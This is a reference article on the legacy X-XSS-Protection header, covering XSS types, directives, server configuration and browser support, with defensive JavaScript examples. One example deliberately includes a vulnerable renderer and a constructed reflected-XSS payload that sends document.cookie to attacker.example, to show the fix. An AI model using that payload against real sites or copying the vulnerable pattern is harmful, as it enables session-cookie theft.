HTTP headers | X-XSS-Protection

HTTP headers pass additional information along with an HTTP request or response. X-XSS-Protection is a response header that controls the browser's built-in reflected-XSS filter: when the filter believes a reflected Cross-site Scripting attack is in progress, it either sanitises the page or stops it from loading. The header is legacy. The filter was removed from Chromium-based browsers, was never implemented in Firefox, and has been superseded by Content-Security-Policy; it is documented here because older browsers and many existing server configurations still use it.

XSS attacks: XSS stands for Cross-site Scripting. The attacker gets script of their choosing to run inside a vulnerable web application's origin, which defeats the Same-origin policy because the browser treats the injected script as the site's own. The attack is possible only when HTML is generated dynamically from user input that is not sanitised or output-encoded: the attacker's markup is then indistinguishable from the page's own markup, so the browser renders and executes it. Script running in the victim's session can read the DOM and any cookie not marked HttpOnly, and can send requests to the application with the user's privileges, including requests that read or change the data the application stores on the server. X-XSS-Protection was the browser vendors' attempt to detect and stop the reflected form of this attack without any change to the application itself.

Syntax:

X-XSS-Protection: directive

Type of XSS Attack: Cross-site Scripting attacks are broadly classified into two categories.

  • Server XSS: the server embeds untrusted data in the HTML response. The vulnerability is in server-side code; the browser simply executes whatever script arrives in the response. Reflected and stored XSS are the usual examples. The reflected variant is the only one the X-XSS-Protection filter could catch, because the filter works by matching script in the response against script that also appears in the request.
  • Client XSS: client-side JavaScript writes untrusted data into the DOM through an unsafe sink such as innerHTML or document.write(). A call that inserts data into the DOM as markup rather than as text is an unsafe JavaScript call. DOM-based XSS is the typical example; the server's response may be entirely clean, so neither the server nor the reflected-XSS filter sees the attack.
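The Server XSS case above, as an added example that is not code from the original article: a hypothetical Node.js search page that echoes the q query parameter into HTML, shown in its vulnerable form beside the fixed one. The attack path, the escapeHtml helper and the header set are all constructed for this example. The fix is output encoding; the headers show the modern pairing of X-XSS-Protection: 0 with a Content-Security-Policy, which is what the legacy filter was only ever a partial backstop for.

```javascript
// Added example (not from the original article): reflected "Server XSS" in a
// hypothetical Node.js search handler, vulnerable and fixed side by side.
// Runs on Node >= 10 (global URL); no network access is needed.

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the untrusted query value is concatenated straight into markup,
// so <script>...</script> in ?q= becomes a live script element.
function renderVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Fixed: encode at the HTML boundary, so the input can only ever be text.
function renderSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Response headers for the fixed page. The legacy filter is switched off
// (its sanitising mode has problems of its own) and CSP does the real work.
function securityHeaders() {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "X-XSS-Protection": "0",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
  };
}

// Build the response for a request path. Kept pure (no socket) so it can be
// exercised directly; a real server copies status, headers and body onto the
// ServerResponse from inside its http.createServer callback.
function respond(path, { vulnerable = false } = {}) {
  const q = new URL(path, "http://localhost").searchParams.get("q") || "";
  return {
    status: 200,
    headers: securityHeaders(),
    body: vulnerable ? renderVulnerable(q) : renderSafe(q),
  };
}

// Constructed attack request: a reflected payload that exfiltrates cookies
// to a hypothetical attacker host.
const ATTACK_PATH =
  "/search?q=" +
  encodeURIComponent('<script>location="https://attacker.example/?c="+document.cookie</script>');
```

respond() decodes the query exactly as a browser-sent request would arrive, so respond(ATTACK_PATH, { vulnerable: true }).body contains a raw script tag while respond(ATTACK_PATH).body contains only &lt;script&gt; text.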

Directives: The header field takes one of four values:

  • 0: disables the filter entirely. This is the value current OWASP guidance recommends, on the condition that a Content-Security-Policy is in place to do the real work.
  • 1: enables the filter in sanitising mode; the browser removes the parts of the page it believes were injected and renders the rest. This is also the behaviour browsers that have the filter fall back to when the header is absent. Sanitising mode has a problem of its own: an attacker who can trigger the filter on purpose can use it to disable chosen scripts on a page, which turns the protection into an information-leak vector and is one of the reasons browsers dropped the filter.
  • 1; mode=block: enables the filter and, on detection, stops the page from rendering altogether instead of sanitising it.
  • 1; report=<reporting-URI>: Chromium-only. Enables the filter; on detection the page is sanitised and a report is sent to the given URI, in the same way as CSP's report-uri.

If the header is set at all, use either 0 (with a Content-Security-Policy) or 1; mode=block; never plain 1.
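To check the directives above against a real set of response headers, here is an added example that is not part of the original article: a parser for the header value and a small lint that applies the caveats listed above. The sample responses at the bottom are constructed for the demonstration and are not from any real site.

```javascript
// Added example (not from the original article): parse an X-XSS-Protection
// value and lint it together with Content-Security-Policy.

// Parse "0", "1", "1; mode=block" or "1; report=<uri>" into its parts.
// Throws on anything the header syntax does not allow.
function parseXssProtection(value) {
  const parts = String(value).split(";").map((p) => p.trim()).filter(Boolean);
  if (parts.length === 0 || !/^[01]$/.test(parts[0])) {
    throw new Error(`invalid X-XSS-Protection value: ${JSON.stringify(value)}`);
  }
  const result = { enabled: parts[0] === "1", mode: null, report: null };
  for (const p of parts.slice(1)) {
    const eq = p.indexOf("=");
    const key = (eq === -1 ? p : p.slice(0, eq)).trim().toLowerCase();
    const val = eq === -1 ? "" : p.slice(eq + 1).trim(); // keeps '=' inside a report URI
    if (key === "mode") result.mode = val.toLowerCase();
    else if (key === "report") result.report = val;
    else throw new Error(`unknown X-XSS-Protection directive: ${p}`);
  }
  return result;
}

// Lint one response's headers (names lower-cased, as Node's http module and
// most scanners present them). Returns a list of findings; empty is good.
function lintXssHeaders(headers) {
  const findings = [];
  const raw = headers["x-xss-protection"];
  const csp = headers["content-security-policy"];

  if (raw === undefined) {
    findings.push("X-XSS-Protection absent: browsers that still have the filter fall back to sanitising mode (1)");
  } else {
    let d;
    try {
      d = parseXssProtection(raw);
    } catch (e) {
      return [e.message];
    }
    if (d.enabled && d.mode !== "block") {
      findings.push("X-XSS-Protection: 1 without mode=block selects sanitising mode; use 0 or 1; mode=block");
    }
  }
  if (csp === undefined) {
    findings.push("no Content-Security-Policy: X-XSS-Protection is not a substitute for it");
  }
  return findings;
}

// Constructed sample responses, shaped like a header scanner's output.
const SAMPLE_RESPONSES = {
  "legacy-default": { "content-type": "text/html" },
  "sanitise-only": { "content-type": "text/html", "x-xss-protection": "1" },
  "block-no-csp": { "content-type": "text/html", "x-xss-protection": "1; mode=block" },
  "modern": {
    "content-type": "text/html",
    "x-xss-protection": "0",
    "content-security-policy": "default-src 'self'; object-src 'none'",
  },
};

// Run the lint over every sample and return { name: findings }.
function auditAll(responses = SAMPLE_RESPONSES) {
  const out = {};
  for (const [name, headers] of Object.entries(responses)) {
    out[name] = lintXssHeaders(headers);
  }
  return out;
}
```

auditAll() reports two findings for the header-less and plain-1 samples, one for mode=block without CSP, and none for the 0-plus-CSP combination.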

Example 1: Block pages from loading when they detect reflected Cross-site Scripting attacks, or turn the filter off:

Enable the filter in blocking mode:

X-XSS-Protection: 1; mode=block

Disable the filter (pair this with a Content-Security-Policy):

X-XSS-Protection: 0


Example 2: Apache, using mod_headers. Note that Header set only applies to successful (2xx) responses; use Header always set if error and redirect responses must carry the header too.

<IfModule mod_headers.c>
  Header set X-XSS-Protection "1; mode=block"
</IfModule>


Example 3: Nginx. Two caveats: a location block that contains its own add_header directive does not inherit add_header directives from the enclosing server block, so repeat the header there; and add the always parameter if the header must also be sent on non-2xx responses.

add_header "X-XSS-Protection" "1; mode=block";


Supported Browsers: The browsers that implemented the filter controlled by X-XSS-Protection are listed below:

  • Google Chrome and other Chromium-based browsers, up to version 77; the XSS Auditor was removed in Chrome 78
  • Internet Explorer, from version 8
  • Safari
  • Opera (Chromium-based, so with the same cut-off as Chrome)

Firefox never implemented the header. Treat it as a legacy setting for old clients and rely on output encoding and Content-Security-Policy for current ones.

